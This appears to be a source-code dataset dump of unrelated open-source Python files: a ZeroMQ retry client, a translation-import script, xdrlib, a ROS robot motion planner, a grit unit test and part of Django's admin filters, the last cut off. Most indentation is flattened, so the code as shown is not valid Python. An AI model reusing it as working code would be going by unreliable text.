davruet/shenanigans.io | experiments/zmq_server/client.py | 1 | 1866 | #!/opt/local/bin/python3.4
#
# Lazy Pirate client
# Use zmq_poll to do a safe request-reply
# To run, start lpserver and then randomly kill/restart it
#
# Author: Daniel Lundin <dln(at)eintr(dot)org>
#
import sys
import zmq
REQUEST_TIMEOUT = 2500
REQUEST_RETRIES = 3
SERVER_ENDPOINT = "tcp://localhost:5555"
context = zmq.Context(1)
print ("I: Connecting to server…")
client = context.socket(zmq.REQ)
client.connect(SERVER_ENDPOINT)
poll = zmq.Poller()
poll.register(client, zmq.POLLIN)
sequence = 0
retries_left = REQUEST_RETRIES
while retries_left:
sequence += 1
request = str(sequence)
print ("I: Sending (%s)" % request)
client.send_string(request)
expect_reply = True
while expect_reply:
socks = dict(poll.poll(REQUEST_TIMEOUT))
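        # poll() waits up to REQUEST_TIMEOUT ms and returns the sockets that became ready as (socket, event) pairs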
if socks.get(client) == zmq.POLLIN:
reply = client.recv()
if not reply:
break
if int(reply) == sequence:
print ("I: Server replied OK (%s)" % reply)
retries_left = REQUEST_RETRIES
expect_reply = False
else:
print ("E: Malformed reply from server: %s" % reply)
else:
print ("W: No response from server, retrying…")
# Socket is confused. Close and remove it.
client.setsockopt(zmq.LINGER, 0)
client.close()
poll.unregister(client)
retries_left -= 1
if retries_left == 0:
print ("E: Server seems to be offline, abandoning")
break
print ("I: Reconnecting and resending (%s)" % request)
# Create new connection
client = context.socket(zmq.REQ)
client.connect(SERVER_ENDPOINT)
poll.register(client, zmq.POLLIN)
client.send_string(request)
context.term()
| agpl-3.0 |
s2hc-johan/nikola | scripts/import_po.py | 8 | 1061 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Download translations from transifex and regenerate files."""
from __future__ import unicode_literals, print_function
import io
from glob import glob
import os
import sys
import polib
if 'nopull' not in sys.argv:
os.system("tx pull -a")
trans_files = glob(os.path.join('translations', 'nikola.messages', '*.po'))
for fname in trans_files:
lang = os.path.splitext(os.path.basename(fname))[0].lower()
lang = lang.replace('@', '_')
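    # gettext locale variants use '@' (e.g. 'sr@latin'); '@' is not valid in the generated module filename, so map it to '_'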
outf = os.path.join('nikola', 'data', 'themes', 'base',
'messages', 'messages_{0}.py'.format(lang))
po = polib.pofile(fname)
lines = """# -*- encoding:utf-8 -*-
from __future__ import unicode_literals
MESSAGES = {""".splitlines()
lines2 = []
for entry in po:
        lines2.append(' "{0}": "{1}",'.format(entry.msgid, entry.msgstr))
lines.extend(sorted(lines2))
lines.append("}\n")
print("Generating:", outf)
with io.open(outf, "w+", encoding="utf8") as outfile:
outfile.write('\n'.join(lines))
| mit |
RiccardoPecora/MP | Lib/xdrlib.py | 55 | 5794 | """Implements (a subset of) Sun XDR -- eXternal Data Representation.
See: RFC 1014
"""
import struct
try:
from cStringIO import StringIO as _StringIO
except ImportError:
from StringIO import StringIO as _StringIO
__all__ = ["Error", "Packer", "Unpacker", "ConversionError"]
# exceptions
class Error(Exception):
"""Exception class for this module. Use:
except xdrlib.Error, var:
# var has the Error instance for the exception
Public ivars:
msg -- contains the message
"""
def __init__(self, msg):
self.msg = msg
def __repr__(self):
return repr(self.msg)
def __str__(self):
return str(self.msg)
class ConversionError(Error):
pass
class Packer:
"""Pack various data representations into a buffer."""
def __init__(self):
self.reset()
def reset(self):
self.__buf = _StringIO()
def get_buffer(self):
return self.__buf.getvalue()
# backwards compatibility
get_buf = get_buffer
def pack_uint(self, x):
self.__buf.write(struct.pack('>L', x))
def pack_int(self, x):
self.__buf.write(struct.pack('>l', x))
pack_enum = pack_int
def pack_bool(self, x):
if x: self.__buf.write('\0\0\0\1')
else: self.__buf.write('\0\0\0\0')
def pack_uhyper(self, x):
self.pack_uint(x>>32 & 0xffffffffL)
self.pack_uint(x & 0xffffffffL)
pack_hyper = pack_uhyper
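    # pack_hyper can reuse pack_uhyper: for negative values, Python's
    # arithmetic shift plus the 0xffffffff masks above yield the
    # two's-complement bit pattern that XDR expects for a signed hyper.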
def pack_float(self, x):
try: self.__buf.write(struct.pack('>f', x))
except struct.error, msg:
raise ConversionError, msg
def pack_double(self, x):
try: self.__buf.write(struct.pack('>d', x))
except struct.error, msg:
raise ConversionError, msg
def pack_fstring(self, n, s):
if n < 0:
raise ValueError, 'fstring size must be nonnegative'
data = s[:n]
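        # XDR (RFC 1014) requires the data to be zero-padded to a multiple of 4 bytes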
n = ((n+3)//4)*4
data = data + (n - len(data)) * '\0'
self.__buf.write(data)
pack_fopaque = pack_fstring
def pack_string(self, s):
n = len(s)
self.pack_uint(n)
self.pack_fstring(n, s)
pack_opaque = pack_string
pack_bytes = pack_string
def pack_list(self, list, pack_item):
for item in list:
self.pack_uint(1)
pack_item(item)
self.pack_uint(0)
def pack_farray(self, n, list, pack_item):
if len(list) != n:
raise ValueError, 'wrong array size'
for item in list:
pack_item(item)
def pack_array(self, list, pack_item):
n = len(list)
self.pack_uint(n)
self.pack_farray(n, list, pack_item)
class Unpacker:
"""Unpacks various data representations from the given buffer."""
def __init__(self, data):
self.reset(data)
def reset(self, data):
self.__buf = data
self.__pos = 0
def get_position(self):
return self.__pos
def set_position(self, position):
self.__pos = position
def get_buffer(self):
return self.__buf
def done(self):
if self.__pos < len(self.__buf):
raise Error('unextracted data remains')
def unpack_uint(self):
i = self.__pos
self.__pos = j = i+4
data = self.__buf[i:j]
if len(data) < 4:
raise EOFError
x = struct.unpack('>L', data)[0]
try:
return int(x)
except OverflowError:
return x
def unpack_int(self):
i = self.__pos
self.__pos = j = i+4
data = self.__buf[i:j]
if len(data) < 4:
raise EOFError
return struct.unpack('>l', data)[0]
unpack_enum = unpack_int
def unpack_bool(self):
return bool(self.unpack_int())
def unpack_uhyper(self):
hi = self.unpack_uint()
lo = self.unpack_uint()
return long(hi)<<32 | lo
def unpack_hyper(self):
x = self.unpack_uhyper()
if x >= 0x8000000000000000L:
x = x - 0x10000000000000000L
return x
def unpack_float(self):
i = self.__pos
self.__pos = j = i+4
data = self.__buf[i:j]
if len(data) < 4:
raise EOFError
return struct.unpack('>f', data)[0]
def unpack_double(self):
i = self.__pos
self.__pos = j = i+8
data = self.__buf[i:j]
if len(data) < 8:
raise EOFError
return struct.unpack('>d', data)[0]
def unpack_fstring(self, n):
if n < 0:
raise ValueError, 'fstring size must be nonnegative'
i = self.__pos
j = i + (n+3)//4*4
if j > len(self.__buf):
raise EOFError
self.__pos = j
return self.__buf[i:i+n]
unpack_fopaque = unpack_fstring
def unpack_string(self):
n = self.unpack_uint()
return self.unpack_fstring(n)
unpack_opaque = unpack_string
unpack_bytes = unpack_string
def unpack_list(self, unpack_item):
list = []
while 1:
x = self.unpack_uint()
if x == 0: break
if x != 1:
raise ConversionError, '0 or 1 expected, got %r' % (x,)
item = unpack_item()
list.append(item)
return list
def unpack_farray(self, n, unpack_item):
list = []
for i in range(n):
list.append(unpack_item())
return list
def unpack_array(self, unpack_item):
n = self.unpack_uint()
return self.unpack_farray(n, unpack_item)
| gpl-3.0 |
WeirdCoder/rss-2014-team-3 | src/robotbrain/src/motionplanner.py | 1 | 19846 | import rospy
import math
import time
from gc_msgs.msg import ConveyorMsg
from gc_msgs.msg import HamperMsg
from gc_msgs.msg import EncoderMsg
from gc_msgs.msg import MotionMsg
from gc_msgs.msg import WheelErrorMsg
from gc_msgs.msg import MotionDistMsg
from gc_msgs.msg import StateMsg
#
# This class is used by the RobotBrain to send PWM messages to the HAL to control the motion of the motors. This includes both wheel motors and the conveyor belt motors. Also has methods to abstract some elements of motor control; has proportional control for the wheels.
#
#TODO: have HAL calculate and send current wheel angular velocities?
class MotionPlanner(object):
def __init__(self, startTime, dumpTime):
# kept updated to reflect robot status
self.currentWheelVel = [0.,0.]; # has current velocities of each wheel in m/s
self.currentWheelDist = [0., 0.]; # used for calculating velocity of each wheel
self.previousDesiredAngVel = 0.
self.previousDesiredTransVel = 0.
self.currentTransVel = 0.
self.currentAngVel = 0.
self.lastEncoderMsgTime = time.clock() # time in seconds. Used for calculating current wheel velocities
self.wheelError = 0.
# timing constants used to ensure that robot stops everything near end of run and dumps current blocks
self.startTime = startTime
self.dumpTime = dumpTime
# constants for wheel motion
# TODO: pick appropriate vales
self.MAX_TRANS_ACCEL = .00001; # maximum translation acceleration in m/s^2
self.MAX_ANG_ACCEL = .0001; # maximum rotational acceleration in rad/s^2
self.ANGULAR_ERR = .01; # acceptable angular error in radians
self.TRANS_ERR = 0.005; # acceptable translation error in m
        self.MAX_WHEEL_ANG_VEL = 0.2; # was 1; maximum angular velocity of wheels in rad/s
        self.MAX_PWM = 255; # maximum PWM command value (0-255), referenced by convertAngVelToPWM
self.WHEELBASE = .375; # distance from origin to wheel; similar to a robot radius
self.LEFT_WHEEL = 0; # for indexing into leftWheel, rightWheel tuples
self.RIGHT_WHEEL = 1;
        # initialize publishers, subscribers
self.statePub = rospy.Publisher('command/State', StateMsg);
self.conveyorPub = rospy.Publisher("/command/Conveyor", ConveyorMsg);
self.hamperPub = rospy.Publisher("/command/Hamper", HamperMsg);
self.encoderSub = rospy.Subscriber('/sensor/Encoder', EncoderMsg, self.handleEncoderMsg);
self.motionPub = rospy.Publisher("/command/Motors", MotionMsg);
self.positionPub = rospy.Publisher("/command/MotorsDist", MotionDistMsg);
self.errorSub = rospy.Subscriber("/sensor/WheelErr", WheelErrorMsg, self.handleWheelErrMsg);
return
#################################
# Publishers/Subscriber Methods #
#################################
def restartHAL(self):
msg = StateMsg()
msg.state = "init"
self.statePub.publish(msg)
return
# params: wheel error msg
# returns: none
# updates self.wheelError from message contents - how far wheels have left to travel
def handleWheelErrMsg(self, msg):
self.wheelError = .5*(abs(msg.leftWheelError) + abs(msg.rightWheelError))
return
# params: EncoderMsg msg
# returns: none
    # calculates current wheel velocities (currentWheelVel) from the encoder message
# assumes encoder message fixes signs so dist is positive when both wheels are moving forward
def handleEncoderMsg(self, msg):
# calculating how much the wheels have moved in the past time step, updating
newDist = [msg.lWheelDist, msg.rWheelDist]; # current tick positions of the wheels
deltaDist = [newDist[self.LEFT_WHEEL] - self.currentWheelDist[self.LEFT_WHEEL], newDist[self.RIGHT_WHEEL]-self.currentWheelDist[self.RIGHT_WHEEL]];
self.currentWheelDist = newDist
# calculating how much time has passed, updating time
currentTime = time.clock();
deltaTime = currentTime - self.lastEncoderMsgTime;
self.lastEncoderMsgTime = currentTime;
# calculate and update the currentWheelAngVel parameter
if (deltaTime > 0.):
self.updateCurrentVel(deltaDist, deltaTime);
return
#################
# Wheel motion ##
#################
# params: currentPose: pose containing current location of robot
    #         destinationLoc: pose containing destination of robot (angle is 0)
    #         angVel: float angular velocity in rad/s
    #         vel: float velocity in m/s
# returns: boolean: true when motion is complete
# using rotateTowards and translateTowards, first rotates to face destination and then translates to it
def travelTowards(self, currentPose, destinationLoc, angVel, vel):
angleToDestination = math.atan2((destinationLoc.getY()-currentPose.getY()),(destinationLoc.getX()-currentPose.getX()));
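        # atan2 gives the absolute world-frame bearing to the destination; rotateTowards compares it against the current heading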
# if not currently facing the destination, rotate towards it so can translate there in a straight line
# rotateTowards will not move if close enough
doneRotating = self.rotateTowards(currentPose.getAngle(), angleToDestination, angVel)
if doneRotating:
# if the robot is facing the destination, move towards it
doneTravelling = self.translateTowards(currentPose, destinationLoc, vel);
return doneTravelling;
# if not done rotating, not done travelling
else:
return False
# params: currentAngle: float currentAngle in radians
# destAngle: float destination angle in radians
# angSpeed: float angular speed in rad/s
# returns: boolean: true when motion is complete
    # Calculates appropriate rotational speed using proportional control (accelerates and decelerates
    # based on angular distance to the destination angle). Calls rotate.
def rotateTowards(self, currentAngle, destAngle, angSpeed):
# calculating distance left to rotate; from [-pi, pi]
distanceLeft = destAngle - currentAngle;
# want distance left [-pi, pi]
if distanceLeft > math.pi:
distanceLeft = distanceLeft - 2*math.pi
elif distanceLeft < -math.pi:
distanceLeft = distanceLeft + 2*math.pi
# if are close enough already, don't move and return true
if abs(distanceLeft) < self.ANGULAR_ERR:
self.rotate(0.)
return True
# maximum current velocity is related to distanceLeft and acceleration
        # Want to decelerate to 0 when distanceLeft = 0. Hence the cap:
        # v(t) = a*t
        # d(t) = .5*a*t**2  =>  t = sqrt(d/(.5*a))
        # vmax = a*t = sqrt(2*a*distLeft)
# speed is minimum of maxSpeed(distance), speed given, speed from accelerating
currentMaxSpeed = self.MAX_ANG_ACCEL*math.sqrt(abs(distanceLeft)/(.5*self.MAX_ANG_ACCEL**2))
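        # NOTE: the expression above algebraically reduces to sqrt(2*abs(distanceLeft)); the MAX_ANG_ACCEL factors cancel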
acceleratedSpeed = abs(self.previousDesiredAngVel + math.copysign(self.MAX_ANG_ACCEL, distanceLeft))
desiredSpeed = min(currentMaxSpeed, angSpeed, acceleratedSpeed)
# moving in direction of distanceLeft
desiredAngVel = math.copysign(desiredSpeed, distanceLeft)
self.previousDesiredAngVel = desiredAngVel
self.rotate(desiredAngVel);
# still have more rotating to do
return False
    # params: currentPose: Pose current location
    #          destination: Pose destination
    #          speed: float desired speed of motion in m/s
    # returns: boolean: true when motion is complete
    # Calculates appropriate translational speed using proportional control (accelerates and decelerates
    # based on distance to the destination). Calls translate.
    # assumes that robot is facing the destination
def translateTowards(self, currentPose, destination, speed):
# calculating the magnitude and sign of the distance from currentLocation to desination
currentDistanceVector = (destination.getX() - currentPose.getX(), destination.getY() - currentPose.getY());
distanceMagnitude = math.sqrt(currentDistanceVector[0]**2 + currentDistanceVector[1]**2);
currentAngleVector = (math.cos(currentPose.getAngle()), math.sin(currentPose.getAngle()));
# if currentDistanceVector dot currentAngleVector is positive, then need to move forward
# otherwise, need to move backwards, so distance will be negative
dotProduct = currentDistanceVector[0]*currentAngleVector[0] + currentDistanceVector[1]*currentAngleVector[1];
velocitySign = math.copysign(1, dotProduct);
# if are close enough already, don't move and return true
if abs(distanceMagnitude) < self.TRANS_ERR:
self.translate(0.)
return True
# maximum current velocity is related to distanceLeft and acceleration
        # Want to decelerate to 0 when distanceLeft = 0. Hence the cap:
        # v(t) = a*t
        # d(t) = .5*a*t**2  =>  t = sqrt(d/(.5*a))
        # vmax = a*t = sqrt(2*a*distLeft)
# speed is minimum of maxSpeed(distance), speed given, speed from accelerating
currentMaxSpeed = self.MAX_TRANS_ACCEL*math.sqrt(distanceMagnitude/(.5*self.MAX_TRANS_ACCEL**2))
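        # NOTE: the expression above algebraically reduces to sqrt(2*distanceMagnitude); the MAX_TRANS_ACCEL factors cancel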
acceleratedSpeed = abs(self.previousDesiredTransVel + math.copysign(self.MAX_TRANS_ACCEL, velocitySign))
desiredSpeed = min(currentMaxSpeed, speed, acceleratedSpeed)
# moving in direction of distanceLeft
desiredTransVel = math.copysign(desiredSpeed, velocitySign)
self.previousDesiredTransVel = desiredTransVel
self.translate(desiredTransVel);
# still have more rotating to do
return False
# OLD CODE
# calculating the magnitude of the velocity
# if within slow-down region (less than .5*a^2 from destination and at least halfway there), use velocity proportional to distance
#currentTransVelocity = .5*self.WHEEL_RADIUS*(self.currentWheelAngVel[self.LEFT_WHEEL] + self.currentWheelAngVel[self.RIGHT_WHEEL]);
#if (distanceMagnitude < .5*self.MAX_WHEEL_TRANS_ACCEL**2) and (distanceMagnitude/startDistance < .5):
# desiredVelocity = velocitySign*distanceMagnitude/self.MAX_WHEEL_TRANS_ACCEL;
# otherwise, if less than the desired velocity, accelerate
#elif abs(currentTransVelocity) < speed:
# desiredVelocity = currentTransVelocity + velocitySign*self.MAX_WHEEL_TRANS_ACCEL;
# otherwise, want to keep traveling at the desired velocity
#else:
# desiredVelocity = velocitySign*speed;
#self.translate(desiredVelocity);
#return
# params: angVelocity: float angular velocity in rad/s
# returns: void
# sends MotionControl message to rotate
def rotate(self, angVelocity):
msg = MotionMsg();
msg.translationalVelocity = 0.0;
msg.rotationalVelocity = angVelocity;
self.motionPub.publish(msg);
return
# params: velocity: float translational velocity in m/s
# returns: void
# sends MotionControl message to translate
def translate(self, velocity):
# send MotionControl Message
msg = MotionMsg();
msg.translationalVelocity = velocity;
msg.rotationalVelocity = 0;
self.motionPub.publish(msg);
return
# params: none
# returns: none
# sends MotionMsg stopping both wheels
def stopWheels(self):
self.restartHAL()
#self.previousDesiredAngVel = 0;
#self.previousDesiredTransVel = 0;
#msg = MotionMsg();
#msg.translationalVelocity = 0;
#msg.rotationalVelocity = 0;
#self.motionPub.publish(msg);
return
# param: angularVel: float angular velocity of robot in rad/s
# returns: float translational velocity for right wheel
# converts angular velocity of robot to translational velocity of right wheel based on robot radius
def convertAngVelToVel(self, angularVel):
return angularVel*self.WHEELBASE;
    # param: angVel: angular velocity of wheel in rad/s
# returns: PWM (0-255) to achieve velocity
# (the 'flipping' of one wheel's velocity is handled in the HAL)
def convertAngVelToPWM(self, angVel):
return angVel/self.MAX_WHEEL_ANG_VEL * self.MAX_PWM;
    # params: deltaDist: float[] [distance moved by left wheel, distance moved by right wheel] in m
    #         deltaTime: float, time elapsed in which wheels have progressed by deltaDist
    # returns: void
    # calculates the current velocity of each wheel and updates currentWheelVel[], currentTransVel and currentAngVel
def updateCurrentVel(self, deltaDist, deltaTime):
# calculating velocity of each wheel
self.currentWheelVel[self.LEFT_WHEEL] = deltaDist[self.LEFT_WHEEL]/deltaTime
self.currentWheelVel[self.RIGHT_WHEEL] = deltaDist[self.RIGHT_WHEEL]/deltaTime
# calculating translational velocity by averaging
self.currentTransVel = .5*(self.currentWheelVel[self.LEFT_WHEEL] + self.currentWheelVel[self.RIGHT_WHEEL]) # average
# calculating rotational velocity by taking the difference and dividing by wheel base
# turning to the left is positive angle - when left wheel is moving backwards
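        # differential-drive kinematics: omega = (v_right - v_left) / track width, where the track width is 2*WHEELBASE (WHEELBASE is the half-track distance)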
self.currentAngVel = .5*(self.currentWheelVel[self.RIGHT_WHEEL] - self.currentWheelVel[self.LEFT_WHEEL])/self.WHEELBASE
return
##########################
# Wheel position methods #
##########################
# These methods use the positional controller in the HAL code
#params: Pose currentPose current pose of robot
# Location location destination
# returns: none
# travels to given point.
def travelTo(self, currentPose, destination):
print 'inside travelTo'
currentDistanceVector = (destination.getX() - currentPose.getX(), destination.getY() - currentPose.getY());
angleToDestination = math.atan2((destination.getY()-currentPose.getY()),(destination.getX()-currentPose.getX())) - currentPose.getAngle();
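        # unlike travelTowards above, the current heading is subtracted here, so rotateTo() receives a relative turn angle for the positional wheel controller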
print 'angle to dest', angleToDestination
# want angleToDestination [-pi, pi]
if angleToDestination > math.pi:
angleToDestination = angleToDestination - 2*math.pi
elif angleToDestination < -math.pi:
angleToDestination = angleToDestination + 2*math.pi
distanceMagnitude = math.sqrt(currentDistanceVector[0]**2 + currentDistanceVector[1]**2);
print 'angle', angleToDestination
print 'distance', distanceMagnitude
# turn to face destination point
print 'calling rotateTo'
self.restartHAL()
self.rotateTo(angleToDestination)
print 'wheelErr', self.wheelError
# wait for wheel error message to get sent
# and then wait until done rotating
time.sleep(0.01)
print 'wheelErrPostTime', self.wheelError
while (self.wheelError > self.ANGULAR_ERR):
# do nothing and wait for wheels to turn
# unless time is greater than dumpTime, in which case, return.
if (time.time() - self.startTime >= self.dumpTime):
return
print 'done turning'
self.restartHAL()
        # wait between turning and translating, for the I term in the wheel controller to settle, so we don't turn and translate at the same time
whileStartTime = time.time()
while ((time.time()-whileStartTime < 5.0) and (time.time()-self.startTime < self.dumpTime)):
pass
print 'start travel'
self.translateTo(distanceMagnitude)
time.sleep(.01) # wait for wheel error message to get sent
while(self.wheelError > self.TRANS_ERR):
# do nothing and wait for wheels to turn
# unless time is greater than dumpTime, in which case, return.
if (time.time() - self.startTime >= self.dumpTime):
return
print 'done translating'
return
# params: angle to turn to
# returns: none
# send message to wheel controller to turn
def rotateTo(self, angle):
print 'sending message'
print 'angle', angle
msg = MotionDistMsg()
msg.translationalDist = 0
msg.rotationalDist = angle
print msg.rotationalDist
self.positionPub.publish(msg)
print 'message sent'
return
# params: distance to travel
# returns: none
# send message to wheel controller to translate distance
def translateTo(self, distance):
msg = MotionDistMsg()
msg.translationalDist = distance
msg.rotationalDist = 0
self.positionPub.publish(msg)
return
##########################
## Conveyor Belt Motion ##
##########################
# params: none
# returns: none
# sends messages to start the conveyor belts that consume blocks at default speed
def startEatingBelts(self):
        # tell the conveyor motors to start at standard speed
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 1
msg.backConveyorFractionOn = 1
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to start both conveyor belts
def startBothBelts(self):
        # tell the conveyor motors to start at standard speed
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 1.0
msg.backConveyorFractionOn = 1.0
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
    # sends messages to reverse the front conveyor belt that consumes blocks
def reverseEatingBelts(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = -.1
msg.backConveyorFractionOn = 0.0
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to stop the conveyor belts that consume blocks
def stopConveyorBelts(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 0.0
msg.backConveyorFractionOn = 0.0
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to start the conveyor belt that moves blocks within the hamper
def startHamperBelt(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 0.0
msg.backConveyorFractionOn = .1
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
    # sends messages to reverse the conveyor belt that moves blocks within the hamper
def reverseHamperBelt(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 0.0
msg.backConveyorFractionOn = -.1
self.conveyorPub.publish(msg)
return
#################
# Hamper motion #
#################
# params: angle, in radians, that hamper should be set to
# returns: none
# sets hamper to desired angle. This is the angle to vertical; hamper is closed at 0 and open at pi/2
def setHamperAngle(self, angle):
fractionOpen = angle/(math.pi/2.0)
msg = HamperMsg()
msg.fractionOpen = fractionOpen
self.hamperPub.publish(msg)
        return
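# --- minimal usage sketch (not part of the original module; names below are
# --- illustrative assumptions, and Pose/Location are assumed to expose the
# --- getX()/getY()/getAngle() accessors used above) ---
#   rospy.init_node('robotbrain')
#   planner = MotionPlanner(startTime=time.time(), dumpTime=570.0)
#   planner.startEatingBelts()
#   planner.travelTo(currentPose, goalLocation)
#   planner.setHamperAngle(math.pi / 2.0)  # open the hamper fully to dump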
| mit |
joisig/grit-i18n | grit/format/c_format_unittest.py | 61 | 1968 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittest for c_format.py.
"""
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
import StringIO
from grit import util
from grit.tool import build
class CFormatUnittest(unittest.TestCase):
def testMessages(self):
root = util.ParseGrdForUnittest("""
<messages>
<message name="IDS_QUESTIONS">Do you want to play questions?</message>
<message name="IDS_QUOTES">
"What's in a name, <ph name="NAME">%s<ex>Brandon</ex></ph>?"
</message>
<message name="IDS_LINE_BREAKS">
Was that rhetoric?
No.
Statement. Two all. Game point.
</message>
<message name="IDS_NON_ASCII">
\xc3\xb5\\xc2\\xa4\\\xc2\xa4\\\\xc3\\xb5\xe4\xa4\xa4
</message>
</messages>
""")
buf = StringIO.StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('c_format', 'en'), buf)
output = util.StripBlankLinesAndComments(buf.getvalue())
self.assertEqual(u"""\
#include "resource.h"
const char* GetString(int id) {
switch (id) {
case IDS_QUESTIONS:
return "Do you want to play questions?";
case IDS_QUOTES:
return "\\"What\\'s in a name, %s?\\"";
case IDS_LINE_BREAKS:
return "Was that rhetoric?\\nNo.\\nStatement. Two all. Game point.";
case IDS_NON_ASCII:
return "\\303\\265\\xc2\\xa4\\\\302\\244\\\\xc3\\xb5\\344\\244\\244";
default:
return 0;
}
}""", output)
class DummyOutput(object):
def __init__(self, type, language):
self.type = type
self.language = language
def GetType(self):
return self.type
def GetLanguage(self):
return self.language
def GetOutputFilename(self):
return 'hello.gif'
if __name__ == '__main__':
unittest.main()
| bsd-2-clause |
deandunbar/html2bwml | venv/lib/python2.7/site-packages/django/contrib/admin/filters.py | 70 | 16602 | """
This encapsulates the logic for displaying filters in the Django admin.
Filters are specified in models with the "list_filter" option.
Each filter subclass knows how to display a filter for a field that passes a
certain test -- e.g. being a DateField or ForeignKey.
"""
import datetime
from django.db import models
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.utils.encoding import smart_text, force_text
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib.admin.utils import (get_model_from_relation,
reverse_field_path, get_limit_choices_to_from_path, prepare_lookup_value)
from django.contrib.admin.options import IncorrectLookupParameters
class ListFilter(object):
title = None # Human-readable title to appear in the right sidebar.
template = 'admin/filter.html'
def __init__(self, request, params, model, model_admin):
# This dictionary will eventually contain the request's query string
# parameters actually used by this filter.
self.used_parameters = {}
if self.title is None:
raise ImproperlyConfigured(
"The list filter '%s' does not specify "
"a 'title'." % self.__class__.__name__)
def has_output(self):
"""
Returns True if some choices would be output for this filter.
"""
raise NotImplementedError('subclasses of ListFilter must provide a has_output() method')
def choices(self, cl):
"""
Returns choices ready to be output in the template.
"""
raise NotImplementedError('subclasses of ListFilter must provide a choices() method')
def queryset(self, request, queryset):
"""
Returns the filtered queryset.
"""
raise NotImplementedError('subclasses of ListFilter must provide a queryset() method')
def expected_parameters(self):
"""
Returns the list of parameter names that are expected from the
request's query string and that will be used by this filter.
"""
raise NotImplementedError('subclasses of ListFilter must provide an expected_parameters() method')
class SimpleListFilter(ListFilter):
# The parameter that should be used in the query string for that filter.
parameter_name = None
def __init__(self, request, params, model, model_admin):
super(SimpleListFilter, self).__init__(
request, params, model, model_admin)
if self.parameter_name is None:
raise ImproperlyConfigured(
"The list filter '%s' does not specify "
"a 'parameter_name'." % self.__class__.__name__)
if self.parameter_name in params:
value = params.pop(self.parameter_name)
self.used_parameters[self.parameter_name] = value
lookup_choices = self.lookups(request, model_admin)
if lookup_choices is None:
lookup_choices = ()
self.lookup_choices = list(lookup_choices)
def has_output(self):
return len(self.lookup_choices) > 0
def value(self):
"""
Returns the value (in string format) provided in the request's
query string for this filter, if any. If the value wasn't provided then
returns None.
"""
return self.used_parameters.get(self.parameter_name, None)
def lookups(self, request, model_admin):
"""
Must be overridden to return a list of tuples (value, verbose value)
"""
raise NotImplementedError(
'The SimpleListFilter.lookups() method must be overridden to '
'return a list of tuples (value, verbose value)')
def expected_parameters(self):
return [self.parameter_name]
def choices(self, cl):
yield {
'selected': self.value() is None,
'query_string': cl.get_query_string({}, [self.parameter_name]),
'display': _('All'),
}
for lookup, title in self.lookup_choices:
yield {
'selected': self.value() == force_text(lookup),
'query_string': cl.get_query_string({
self.parameter_name: lookup,
}, []),
'display': title,
}
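# A minimal SimpleListFilter usage sketch (hypothetical 'birthday' model field,
# following the example from the Django documentation; kept as a comment here
# for illustration only):
#
#   class DecadeBornListFilter(SimpleListFilter):
#       title = _('decade born')
#       parameter_name = 'decade'
#
#       def lookups(self, request, model_admin):
#           return (
#               ('80s', _('in the eighties')),
#               ('90s', _('in the nineties')),
#           )
#
#       def queryset(self, request, queryset):
#           if self.value() == '80s':
#               return queryset.filter(birthday__gte=date(1980, 1, 1),
#                                      birthday__lte=date(1989, 12, 31))
#           if self.value() == '90s':
#               return queryset.filter(birthday__gte=date(1990, 1, 1),
#                                      birthday__lte=date(1999, 12, 31))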
class FieldListFilter(ListFilter):
_field_list_filters = []
_take_priority_index = 0
def __init__(self, field, request, params, model, model_admin, field_path):
self.field = field
self.field_path = field_path
self.title = getattr(field, 'verbose_name', field_path)
super(FieldListFilter, self).__init__(
request, params, model, model_admin)
for p in self.expected_parameters():
if p in params:
value = params.pop(p)
self.used_parameters[p] = prepare_lookup_value(p, value)
def has_output(self):
return True
def queryset(self, request, queryset):
try:
return queryset.filter(**self.used_parameters)
except ValidationError as e:
raise IncorrectLookupParameters(e)
@classmethod
def register(cls, test, list_filter_class, take_priority=False):
if take_priority:
# This is to allow overriding the default filters for certain types
# of fields with some custom filters. The first found in the list
# is used in priority.
cls._field_list_filters.insert(
cls._take_priority_index, (test, list_filter_class))
cls._take_priority_index += 1
else:
cls._field_list_filters.append((test, list_filter_class))
@classmethod
def create(cls, field, request, params, model, model_admin, field_path):
for test, list_filter_class in cls._field_list_filters:
if not test(field):
continue
return list_filter_class(field, request, params,
model, model_admin, field_path=field_path)
class RelatedFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
other_model = get_model_from_relation(field)
if hasattr(field, 'rel'):
rel_name = field.rel.get_related_field().name
else:
rel_name = other_model._meta.pk.name
self.lookup_kwarg = '%s__%s__exact' % (field_path, rel_name)
self.lookup_kwarg_isnull = '%s__isnull' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg)
self.lookup_val_isnull = request.GET.get(self.lookup_kwarg_isnull)
self.lookup_choices = field.get_choices(include_blank=False)
super(RelatedFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
if hasattr(field, 'verbose_name'):
self.lookup_title = field.verbose_name
else:
self.lookup_title = other_model._meta.verbose_name
self.title = self.lookup_title
def has_output(self):
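        # 'and' binds tighter than 'or', so this checks: (reverse relation whose underlying field is nullable) OR (forward relation that is itself nullable)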
if (isinstance(self.field, models.related.RelatedObject) and
self.field.field.null or hasattr(self.field, 'rel') and
self.field.null):
extra = 1
else:
extra = 0
return len(self.lookup_choices) + extra > 1
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg_isnull]
def choices(self, cl):
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
yield {
'selected': self.lookup_val is None and not self.lookup_val_isnull,
'query_string': cl.get_query_string({},
[self.lookup_kwarg, self.lookup_kwarg_isnull]),
'display': _('All'),
